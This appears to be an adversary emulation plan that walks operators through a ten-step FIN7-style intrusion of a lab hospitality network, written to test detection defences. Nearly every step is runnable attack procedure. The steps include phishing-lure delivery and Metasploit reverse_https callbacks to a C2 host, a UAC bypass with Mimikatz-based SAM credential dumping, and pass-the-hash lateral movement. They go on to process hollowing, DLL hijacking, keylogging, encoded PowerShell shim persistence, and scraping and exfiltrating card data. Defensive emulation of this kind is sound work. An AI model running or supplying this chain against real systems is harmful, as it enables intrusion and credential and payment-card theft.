#
Scenario 1
#
Preface
For the purpose of this emulation plan, FIN7 operations have been separated into 2 scenarios (detections and protections), with steps and granular procedures contained within each. This division enables users to separately test detection and protection capabilities of their defenses. Within each scenario, operations have been broken into specific objectives, which are presented linearly.
While in Scenario 1 each objective enables subsequent objectives, Scenario 2 is designed such that each objective is run independently of any other. Specifically, this scenario is intended to be used in an environment that does not have protective/preventative defense measures enabled, so as to assess detection capabilities. That said, each organization can tailor this emulation to their individual use case, priorities, and available resources. The assessing team can begin at any scenario or objective but should do so understanding that each objective enables succeeding objectives.
This emulation plan contains several placeholder values that are meant to be replaced with values specific to the target environment against which this plan is to be run. For ease of use, a script has been included to automatically make these substitutions, found here.
#
Overview - Detections
- Emulation of FIN7 usage of tools such as SQLRat, BABYMETAL, BOOSTWRITE, and PILLOWMINT
- Scenario begins after delivery of a reverse shell payload distributed via spearphishing
- Targeted attack of a hospitality organization with the explicit goal of credit card theft
- Designed to assess detection capabilities
#
Contents
Step 0 - Start C2 Server Step 1 - Initial Breach Step 2 - Delayed Malware Execution Step 3 - Target Assessment Step 4 - Staging Interactive Toolkit Step 5 - Escalate Privileges Step 6 - Expand Access Step 7 - Setup User Monitoring Step 8 - User Monitoring Step 9 - Setup Shim Persistence Step 10 - Steal Payment Data
#
Pre-requisites
Prior to beginning the following emulation Scenario, ensure you have the proper infrastructure requirements and configuration in place as stated in the Scenario 1 Infrastructure documentation.
#
Step 0 - Start C2 Server
Before the scenario begins, the attacker needs to start their C2 server to catch their first beacon from the target.
#
Procedures
On the Windows Attack Platform
:
Open command prompt and
cd
to thec2fin7.exe
binaryExecute the following command
[ATT&CK RAT]> C:\c2fin7.exe -server 192.168.0.6
On the Linux Attack Platform
:
Start
tmux
tmux
#
Step 1 - Initial Breach (Evaluations Step 11)
The scenario begins with an initial breach where a legitimate user (T1204) opens an RTF document and double clicks text that says "Double Click Here to Unlock Contents". The RTF file contains an embedded Visual Basic payload (T1027). After double clicking the text block, mshta.exe
executes (T1170) the Visual Basic payload(T1059).
mshta.exe
then assembles embedded text within the RTF file into a JavaScript payload. Next, mshta.exe
makes a copy of the legitimate wscript.exe
on disk as Adb156.exe
(T1036). winword.exe
spawns verclsid.exe
(T1175). mshta.exe
loads taskschd.dll
and creates a scheduled task to execute in 5 minutes (T1053).
#
Procedures
#
1.A - User Execution: Malicious File (with licensed Microsoft Word) (T1204.002)
If testing with Microsoft Word, perform the following. If not, perform
On the Linux Attack Platform
:
Copy
2-list.rtf
to<domain_admin>
's Desktop onhotelmanager
.sudo smbclient -U '<domain_full>\<domain_admin>' //<hotelmanager_ip>/C$ -c "put fin7/Resources/Step1/SQLRat/2-list.rtf Users\\<domain_admin>.<domain>\\Desktop\\2-list.rtf"
Provide
<domain_admin>
's password when prompted:<domain_admin_password>
On hotelmanager
:
Login to victim workstation as
<domain_admin>
xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hotelmanager_ip>
Double-click
2-list.rtf
located on<domain_admin>
's desktopDecline any spurious prompts, including updating document with linked data
Double click the text that says "Double Click Here To Unlock Contents"
When prompted to run an
lnk
file, click "open"Set a timer for 6 minutes - the scheduled task will fire 5 minutes after opening the lnk file on the minute so take 6 to be safe
#
1.A* - User Execution: Malicious File (without a Microsoft Word license)
Perform the following if you're testing without Office licenses:
On the Linux Attack Platform
:
Upload
2-list.rtf
,unprotectedNoWord.lnk
, andobfuscated-payload.vbs
tohotelmanager
as2-list.rtf
,2-list.lnk
, andpayload.vbs
respectivelysudo smbclient -U '<domain_full>\<domain_admin>' //<hotelmanager_ip>/C$ -c "put fin7/Resources/Step1/SQLRat/2-list.rtf Users\\<domain_admin>.<domain>\\Desktop\\2-list.rtf; put /home/<attacker>/Enterprise/fin7/Resources/Step1/unprotectedNoWord.lnk Users\\<domain_admin>.<domain>\\Desktop\\2-list.lnk; put /home/<attacker>/Enterprise/fin7/Resources/Step1/obfuscated-payload.vbs Users\\<domain_admin>.<domain>\\AppData\\Local\\payload.vbs"
Provide
<domain_admin>
's password when prompted:<domain_admin_password>
On hotelmanager
:
Login to victim workstation as
<domain_admin>
xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hotelmanager_ip>
Double-click
2-list.rtf
located on<domain_admin>
's desktopDecline any spurious prompts, including updating document with linked data
Double click
2-list.lnk
on<domain_admin>
's DesktopSet a timer for 6 minutes - the scheduled task will fire 5 minutes after opening the lnk file on the minute so take 6 to be safe
#
Cited Intelligence
FIN7 has created malicious DOCX and RTF lures that convince users to double-click on an image in the document. When a user double-clicks an image, an embedded malicious LNK file is spawned that launches mshta.exe, which executes a VBScript one-liner to decode a script hidden in the document. 4
FIN7 has copied wscript.exe into %LOCALAPPDATA% and renamed it. 3,25
#
Step 2 - Delayed Malware Execution (Evaluations Step 12)
The previously created scheduled task spawns Adb156.exe
via svchost
(T1053.005).
Adb156.exe
then loads scrobj.dll
and executes sql-rat.js
via jscript (T1059.7).
Next, Adb156.exe then connects to 192.168.0.6 via MSSQL transactions (T1071) (TCP port 1433).
Finally, FIN7 performs WMI queries to obtain network configuration information (T1016) and system information (T1082).
#
Procedures
#
2.A - SQLRat Execution via Scheduled Task (T1053.005)
On the Windows Attack Platform
:
To verify that you have a new session on
hotelmanager
from your C2 server, run the following command to get the MAC ofhotelmanager
[ATT&CK RAT]> get-mac-serial
#
2.B - Upload Powershell Stager
Upload the PowerShell stager via SQLRat.
[ATT&CK RAT]> upload-file C:\\stager.ps1 C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\stager.ps1
#
Cited Intelligence
FIN7 has created scheduled tasks to establish persistence. 23,4
SQLRat has dropped files and executed SQL scripts on a host system. 5
FIN7 has deployed a custom "profiling" script to fingerprint the machine and network environment. 3
SQLRat has downloaded a powershell script through MSSQL transactions. 5
#
Step 3 - Target Assessment (Evaluations Step 13)
Adb156.exe makes WMI queries for process discovery (T1057).
Next, Adb156.exe spawns cmd.exe
to execute net view
(T1135).
As a defensive evasion tactic, FIN7 leverages Adb156.exe to query for virtualization/sandbox
information (T1497). FIN7 then leverages Adb156.exe to query the USERNAME
environment variable (T1033) and the COMPUTERNAME
(T1082)
environment variable.
Adb156.exe accesses the Windows Script Host ADSystemInfo Object COM object by
loading adsldp.dll
then calling the DllGetClassObject()
API (T1082).
Next, Adb156.exe makes another WMI query for System Network Configuration discovery (T1016) and System Information Discovery (T1082).
Finally, Adb156.exe downloads takeScreenshot.ps1 from 192.168.0.6 via MSSQL transactions. FIN7 then spawns cmd.exe (T1059) and then launches powershell.exe (T1086). FIN7 leverages powershell to execute a script that performs a screen capture (T1113) of the local desktop. Then, the screenshot is uploaded to 192.168.0.6 via MSSQL transactions (T1041).
#
Procedures
#
3.A - Local Discovery (T1057, T1135, T1497, T1033, T1082, T1016)
On the Windows Attack Platform
:
Perform initial system triage
[ATT&CK RAT]> enum-system
#
3.B - Screen Capture (T1105, T1059.003, T1059.001, T1113, T1041)
Upload screenshot utility to take screenshot of user's desktop
[ATT&CK RAT]> upload-file C:\\takeScreenshot.ps1 C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\takeScreenshot.ps1
Execute the
takescreenshot.ps1
PowerShell script[ATT&CK RAT]> exec-cmd "powershell.exe C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\takeScreenshot.ps1"
Download the screenshot
[ATT&CK RAT]> download-file C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\Temp\\image.png C:\\image.png
#
Cited Intelligence
HALFBAKED has been utilized to listen for commands from the C2 server to carry out tasks such as sending victim machine information and listing processes running. 25
FIN7 has deployed capabilities that allow the operators to take a screenshot of the remote system. 25, 4
#
Step 4 - Staging Interactive Toolkit (Evaluations Step 14)
The stager uploaded in stage-1 is now executed which results in a Meterpreter shell (BABYMETAL) which is used for this step. Adb156.exe spawns cmd.exe(T1059) which then spawns powershell.exe(T1086). powershell.exe
then decodes an embedded DLL payload (T1140) which is executed via the PowerShell cmdlet Invoke-Expression
(T1086). Finally, powershell.exe loads shellcode into memory(T1140) from a data received via a network connection made to port 443 on the C2 server (T1071, T1032).
#
Procedures
#
4.A - Staging Interactive Toolset (T1086)
On the Linux Attack Platform
:
Start Metasploit
sudo msfconsole
Start a Meterpreter handler on port 443
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set lport 443 set lhost 192.168.0.4 set ExitOnSession False exploit -j
On the Windows Attack Platform
:
Execute the stager.ps1 script and wait for the Meterpreter callback
[ATT&CK RAT]> exec-cmd "powershell.exe -ExecutionPolicy Bypass -NoExit -File C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\stager.ps1"
You should receive a new Meterpreter session on the Linux Attack Platform
.
#
Cited Intelligence
- FIN7 has executed a PowerShell script to decode and inject shellcode via an embedded DLL into memory. 23, 4, 18
#
Step 5 - Escalate Privileges (Evaluations Step 15)
FIN7 leverages powershell.exe to execute the CreateToolHelp32Snapshot()
(T1057) Win32 API for process discovery. Next, samcat.exe
(a modified version of mimikatz) and uac-samcats.ps1
are downloaded from the C2 server via powershell.exe (T1507). FIN7 then executes the uac-samcats.ps1
. This in turn spawns powershell.exe from powershell.exe(T1086) followed
by executing samcat.exe as a high integrity process (T1088). The samcat.exe
executable reads local credentials from SAM (T1003.001). Then powershell.exe
executes the GetIpNetTable()
(T1016)
API to identify ARP entires. powershell.exe
then spawns nslookup.exe
to query hoteldc
(<hoteldc_ip>) for an IP identified from the ARP entry (T1018).
- Note, SamCats is a modified version of mimikatz that just runs Mimikatz SAM dumping components
#
Procedures
#
5.A - Enumerate-Processes, Execute SamCats, and Discover ITAdmin (T1059.001, T1140, T1071.001, T1573.002)
On the Linux Attack Platform
:
Interact with the recently obtained Meterpreter session
msf > sessions -i 1
List processes
meterpreter > ps -ax
Upload
samcat.exe
(modified Mimikatz) anduac-samcats.ps1
(UAC Bypass script) tohotelmanager
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step5/samcat.exe "C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\samcat.exe"
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step5/uac-samcats.ps1 "C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\uac-samcats.ps1"
Execute the UAC bypass script
meterpreter > execute -f powershell.exe -H -i -a "-c C:\Users\<domain_admin>.<domain>\AppData\Local\uac-samcats.ps1"
Wait for the script to return. You should see credentials dumped to the screen.
Discover ARP entries
meterpreter > arp
Perform
nslookup
againstitadmin
meterpreter > execute -f nslookup.exe -H -i -a "<itadmin_ip>"
#
Cited Intelligence
FIN7 has used memory scrapers such as mimikatz to dump the passwords of logged on users. 9, 6
The Carbank malware has contained a UAC bypass. 10
FIN7 has used tools such as PowerSploit to pivot to additional hosts. 6
#
Step 6 - Expand Access (Evaluations Step 16)
Step 6A begins by downloading paexec.exe
and hollow.exe
via powershell.exe (T1105) to
AppData\Local\
of the current Meterpreter session user. Next, FIN7 interactes with with the target through Meterpreter spawning powershell.exe from cmd.exe (T1059.003). The password hash obtained from samcats.exe
is leveraged by paexec(T1021.002) to copy hollow.exe
onto the IT Admin host as user kmitnick The executable paexec.exe
starts a temporary Windows service(T1035) during the copying process called PAExec-{PID}-{HOSTNAME}.exe
which executes the hollow.exe (T1021.002). The executable hollow.exe
spawns svchost.exe and unmaps its memory image (T1055.012). Then, svchost exchanges data with 192.168.0.4 over HTTPS protocols (T1071.001, T1573.002).
#
Procedures
#
6.A - Expand Access (T1105, T1059.003, T1078.002, T1021.002, T1569.002, T1055.012)
On the Linux Attack Platform
:
Upload the lateral movement utility,
paexec.exe
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step6/paexec.exe "C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\paexec.exe"
Upload the
hollow.exe
(process hollowing) executablemeterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step6/hollow.exe "C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\hollow.exe"
Drop into an interactive session on the target host
meterpreter > shell
Change directory to
C:\Users\<domain_admin>.<domain>\AppData\Local
cmd > cd "C:\Users\<domain_admin>.<domain>\AppData\Local"
Use
paexec.exe
to perform pass-the-hash to executehollow.exe
onitadmin
cmd > paexec.exe \\<itadmin_ip> -s -u <domain>\<domain_admin> -p <domain_admin_password_hash> -c -csrc ".\hollow.exe" hollow.exe
Wait to receive a new Meterpreter session and for
paexec
to return.paexec
never finishes execution, press enter a few times and wait for the prompt to return.Exit the CMD prompt from within the Meterpreter session
cmd > exit
Background the current Meterpreter session
meterpreter > background
#
Cited Intelligence
FIN7 has used PAExec to execute remote commands and move laterally within an environment. 9, 6
FIN7 has performed process injection to execute malicious payloads from memory. 19, 13
#
Step 7 - Setup User Monitoring (Evaluations Step 17)
Step 7 focuses on emulating the DLL Hijacking and module execution functionality of BOOSTWRITE. This step starts by creating a BOOSTWRITE Meterpreter handler as well as staging a temporary Python HTTP server hosting an index.html page with the ASCII character "B". Next, svchost.exe
(Meterpreter session obtained via hollow.exe
execution) downloads BOOSTWRITE.dll to C:\Windows\SysWOW64\srrstr.dll
(T1105). The "srrstr.dll" DLL is masquerading) to match the legitimate name of srrstrl.dll which is found in C:\Windows\System32
. Next, cmd.exe
spawns from svchost.exe
(T1059.003)) which executes SystemPropertiesAdvanced.exe
that in turn loads and executes the malicious srrstr.dll
(T1574)). After srrstr.dll
has been loaded and executed, rundll32.exe
is spawned as a child process to communicate with the C2 server over HTTPs protocol on port 8080 (T1071), T1573)) granting a new shell to the adversary.
#
Procedures
#
7.A - Boostwrite (T1105, T1036.005, T1059.003, T1574.001, T1071.001, T1573.002)
On the Linux Attack Platform
:
Open a new
tmux
windowCtrl+b c
Setup a Python SimpleHTTPServer to host the XOR key
echo "B" > /tmp/index.html; cd /tmp/; sudo python3 -m http.server 80
Switch back to the Metasploit terminal
Ctrl+b n
Setup a Meterpreter handler on 8080 for the BOOSTWRITE shell
use exploit/multi/handler set payload windows/meterpreter/reverse_https set lport 8080 set lhost 192.168.0.4 set ExitOnSession False exploit -j
Switch to the newly received Meterpreter shell created by hollow.exe
[msf]> sessions -i 2
Upload
BOOSTWRITE.dll
toC:\Windows\Syswow64\
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step7/BOOSTWRITE.dll "C:\\Windows\\SysWOW64\\srrstr.dll"
Launch
SystemPropertiesAdvanced.exe
to execute the DLL hijackmeterpreter > execute -f "cmd.exe /c C:\\Windows\\Syswow64\\SystemPropertiesAdvanced.exe"
You should receive a new Meterpreter session.
Switch back to the Python HTTP Server
tmux
windowCtrl+b n
Stop the Python HTTP Server, we no longer need it
Ctrl+c
Exit the HTTP Server
tmux
windowexit
#
Cited Intelligence
- BOOSTWRITE is a loader that has been launched via abuse of the DLL search order of applications which load legitimate services. This has included matching names of legitimate DLLs to force applications to import BOOSTWRITE DLLs instead of the legitimate DLLs.2
#
Step 8 - User Monitoring (Evaluations Step 18)
Step 8 focuses on emulating user monitoring activity. Adversary emulation begins by migrating into explorer.exe
from
svchost.exe
(T1055). Next, the metasploit screenspy module is leveraged for screen capture (T1113). Upon completing screencapture, the Meterpreter session is then migrated into mstsc.exe (T1056.001) and a keylogger is deployed via Meterpreter (T1056.001).
#
Procedures
#
8.A - User Monitoring (T1055, T1113, T1055, T1056.001)
On itadmin
, begin roleplaying as the legitimate <domain_admin>
user:
Log in to
itadmin
as<domain_admin>
xfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:<itadmin_ip>
Open the Remote Desktop Connection client
windows key (or type in search) > mstsc.exe > enter
On the Linux Attack Platform
:
Background the current Meterpreter session
meterpreter > background
Perform 180 screen captures using Metasploit's
screen_spy
module through thehollow.exe
Meterpreter session.use post/windows/gather/screen_spy set COUNT 180 set DELAY 1 set VIEW_SCREENSHOTS false set SESSION 2 exploit
Wait for the
screen_spy
module to complete, then confirm that the screenshots were recorded.msf> loot -t screenspy.screenshot
Interact with the
hollow.exe
Meterpreter sessionmsf> sessions -i 2
Migrate into
mstsc.exe
(RDP client)meterpreter > migrate -N mstsc.exe
Start keylogging within
mstsc.exe
meterpreter > keyscan_start
Switch back to itadmin
and continue roleplaying as the legitimate <domain_admin>
user:
Enter an RDP session using the
mstsc.exe
RDP clientIP Address: <accounting_ip> Username: <domain>\<domain_admin> Password: <domain_admin_password>
Back on the Linux Attack Platform
:
Dump the logged keys
meterpreter > keyscan_dump
Stop the keylogging process
meterpreter > keyscan_stop
#
Cited Intelligence
- The Carbanak malware is capable of recording video of a victim's desktop and performining keylogging. 7, 21
#
Step 9 - Setup Shim Persistence (Evaluations Step 19)
Step 9 focuses on emulating persistence techniques. Adversary emulation begins with a valid logon to the accounting workstation as user kmitnick (T078). After establishing a RDP session from itadmin
to accounting
over TCP port 3389 (T1021, T1090). powershell.exe
is spawned from powershell.exe
(T1059).
The powershell.exe
executable then executes base64 encoded commands (T1027) to download dll329.dll
and sdbE376
from the C2 server (T1105). The executable sdbinst.exe
is then used to install sdbE376.tmp
for
application shimming (T1546.011).
#
Procedures
#
9.A - Pivot to Accounting (T1078.003, T1021, T1090, T1059.001, T1027)
On the Linux Attack Platform
:
Background the current Meterpreter session
meterpreter > background
Create a
reverse_https
Meterpreter listener on port 53msf > handler -p windows/meterpreter/reverse_https -H 192.168.0.4 -P 53
Interact with your Boostwrite shell on
itadmin
msf > sessions -i 3
Create a portfwd to tunnel port 3389 from the
Linux Attack Platform
to theAccounting
workstationmeterpreter > portfwd add -l 3389 -p 3389 -r <accounting_ip>
Background this Meterpreter session
meterpreter > background
On your Ubuntu
machine:
RDP to
accounting
through the TCP tunnel from theLinux Attack Platform
, mounting a local folder as a drivexfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:192.168.0.4 /drive:X,/home/attack/Enterprise/fin7/Resources/Step9
#
9.B - Setup Shim Persistence (T1105, T1546.011)
On accounting
:
Open an administrative PowerShell session
Paste and run the following encoded PowerShell command to prep and install the application shim
powershell > powershell -noprofile -encodedCommand "JABkAGwAbAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAiAFwAXAB0AHMAYwBsAGkAZQBuAHQAXABYAFwAYgBpAG4AMwAyADkALgB0AG0AcAAiACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAEQAUgBNAFwAIgAgAC0ATgBhAG0AZQAgACIANAAiACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAQgBpAG4AYQByAHkAIAAtAFYAYQBsAHUAZQAgACQAZABsAGwAIAAtAEYAbwByAGMAZQA7ACAAIABDAG8AcAB5AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAXABcAHQAcwBjAGwAaQBlAG4AdABcAFgAXABkAGwAbAAzADIAOQAuAGQAbABsACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgAgAC0ARgBvAHIAYwBlADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAXABcAHQAcwBjAGwAaQBlAG4AdABcAFgAXABzAGQAYgBFADMANwA2AC4AdABtAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcAAiACAALQBGAG8AcgBjAGUAOwAgACAAJgAgAHMAZABiAGkAbgBzAHQALgBlAHgAZQAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGQAYgBFADMANwA2AC4AdABtAHAAIgA7AA=="
Note: this PowerShell command places the files needed for the shim persistence into the
C:\Windows\Temp
directory, adds a registry key for the DLL to be installed as a shim toHKLM:\Software\Microsoft\DRM\
, and lastly runssdbinst.exe
to perform the installation.
#
Cited Intelligence
The Carbanak malware is capable of performing network tunneling. 21
FIN7 has utilized terminal services such as Remote Desktop Protocol (RDP) to move laterally within environments. 9
FIN7 has leveraged an application shim database registered using the sdbinst.exe utility to achieve persistence on systems in multiple environments. To install and register the malicious shim database, FIN7 has used custom Base64 encoded PowerShell scripts. 24
#
Step 10 - Steal Payment Data (Evaluations Step 20)
Step 10 focuses on stealing payment data from AccountingIQ.exe. AccountingIQ.exe is a fake payment application meant to mimic credit card data processing. The
emulation procedure begins with the machine being rebooted, which in turn queries
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB
which loads the previously placed dll329.dll
(T1546.011).
AccountingIQ.exe
then injects into SyncHost.exe (T1071.
The executable rundll32.exe
then communicates back to the C2 host via HTTPS over port 53 (T1071.001,
T1573). The executable debug.exe
is then downloaded from the C2 server (T1105) and performs process discovery tasks (T1057).
rundll32.exe
then downloads 7za.exe from the C2 server and zips up the previously dumped payment data.
#
Procedures
#
10.A - Execute Shim Persistence (T1138)
On accounting
:
Reboot the host from the administrative PowerShell session
powershell > restart-computer
On your Ubuntu
machine:
RDP back into
accounting
via the previously created TCP port 3389 tunnelxfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:192.168.0.4
You should receive a new Meterpreter session on the Linux Attack Platform
.
#
10.B - Obtain Credit Card Data (T1055, T1071.001, T1573)
On the Linux Attack Platform
:
Interact with the new Meterpreter session obtained on
accounting
msf > sessions -i 4
Upload the PillowMint credit card scraper as
debug.exe
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step10/pillowMint.exe C:\\Users\\Public\\debug.exe
Switch to the
C:\Users\Public
directorymeterpreter > cd C:\\Users\\Public
Execute PillowMint
meterpreter > execute -f debug.exe -H -i
Upload file archiving utility
7za.exe
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step10/7za.exe C:\\Users\\Public\\7za.exe
Execute archiving utility to archive credit card data
meterpreter > execute -f 7za.exe -H -i -a "a log log.txt"
Exfiltrate the previously dumped credit card data
meterpreter > download C:\\Users\\Public\\log.7z /tmp/log.7z
FIN7 operations end here.
Background the current Meterpreter session
meterpreter > background
Kill all Meterpreter sessions
msf > sessions -K
Kill all Metasploit handlers
msf > jobs -K
Exit Metasploit
msf > exit
#
Cited Intelligence
FIN7 has utilized application shimming to execute a payload stored within the registry. 24
Pillowmint has been used to scrape payment card data from memory. 9
FIN7 has targeted specific processes related to POS systems, read memory from the processes, and written them to disk for later collection. 19